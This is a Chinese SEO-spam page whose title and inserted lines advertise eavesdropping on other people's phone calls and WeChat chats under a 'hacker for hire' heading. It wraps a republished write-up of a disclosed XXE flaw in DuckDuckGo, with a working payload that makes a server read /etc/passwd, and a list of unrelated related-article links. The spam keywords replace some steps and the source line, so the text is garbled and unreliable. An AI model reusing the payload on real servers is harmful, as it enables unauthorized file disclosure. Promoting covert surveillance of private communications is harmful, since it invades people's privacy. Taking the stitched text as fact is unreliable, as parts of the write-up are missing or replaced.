窃听别人手机的通话_窃听别人微信聊天记录

访客3年前关于黑客接单852

窃听别人手机的通话_窃听别人微信聊天记录

近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。

DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。

漏洞详情

漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。

只要输入一个远程的xm l资源http://malicious_server/xxe.xml,服务器就会解析并执行,并返回一个输出。

而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。

具体步骤如下

1.攻击者在他所控制的服务器中放上一个恶意xml文件,并对公网开放,文件内容如下。

<?xm l version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><creds> <user>&xxe;</user> <pass>mypass</pass></creds>

窃听别人手机的通话_窃听别人微信聊天记录

2.窃听别人手机的通话_窃听别人微信聊天记录

3.返回的页面可以看到xm l文件解析结果

在确认了漏洞后,DuckDuckGo工作人员也对其表示了感谢。

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

来源:窃听别人手机的通话_窃听别人微信聊天记录

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA- *** 空间安全搜索引擎、FOEYE- *** 空间检索系统、NOSEC-安全讯息平台。

为您提供: *** 空间测绘、企业资产收集、企业威胁情报、应急响应服务

标签: 好话题

相关文章

这样对你的男人最好分手 6大步骤

如果有一个男人真的爱你,那么他会和你在一起,试着了解你的一切,真的喜欢会让他的心只有你一个人。 这样对你的男人最好分手 1. 当时,他觉得你做的任何事情都很有魅力,就像很多人说的:如果像你这样的人...

网络个人信息泄露&amp;quot;暗箭难防&amp;quot; 如何保证&amp;quot;我就是我&amp;quot;_我就是我

在手机App中植入安全漏洞,再通过电脑端软件操作,只需几秒钟,工作人员便可控制“千里之外”的手机摄像头、扬声器进行偷拍、窃听,一场现实版“窃听风云”在2019年网络安全宣传周上的网络安全博览会互动体验...

廉价外卖生产过程视频完整版 令人作呕_外卖

【廉价外卖生产过程】外卖商家使用速食包,加热后再包装,通过外卖平台大量售出。拍客卧底合肥一家大型料理包厂一周,拍下触目惊心的镜头……负责人声称:日产40万份料理包一半用于外卖,仅华东地区外卖月销量就达...

身份证怎么查开的房记录查询系统

很多人对于身份证这种东西的传统印象,可能就是一种对自己身份的一种认知、证明自己的独一无二,但其实现在这种身份证都藏着一张磁条除了说证明你的相应身份证明之外还存留着很多你在公安那边留着的东西,那用身份证...

Horde IMP Webmail客户端跨站脚本和HTML注入漏洞

影响版本:Horde IMP 4.3.x Horde IMP 4.2.x漏洞描述:BUGTRAQ  ID: 33492CVE(CAN) ID: CVE-2009-0930 IMP是一款基于Web的强大...

网站以 裸聊为诱饵诈骗一千余万,主犯获刑11年

以“裸聊”为诱饵,让人在网站付费并表示可以退还,实际受害人付费后再也无法退款。2016年7月,湖北蕲春县公安局历时3个月,跨6个省,成功破获公安部挂牌督办的特大“MOMO”网站网络诈骗案件,抓获涉案团...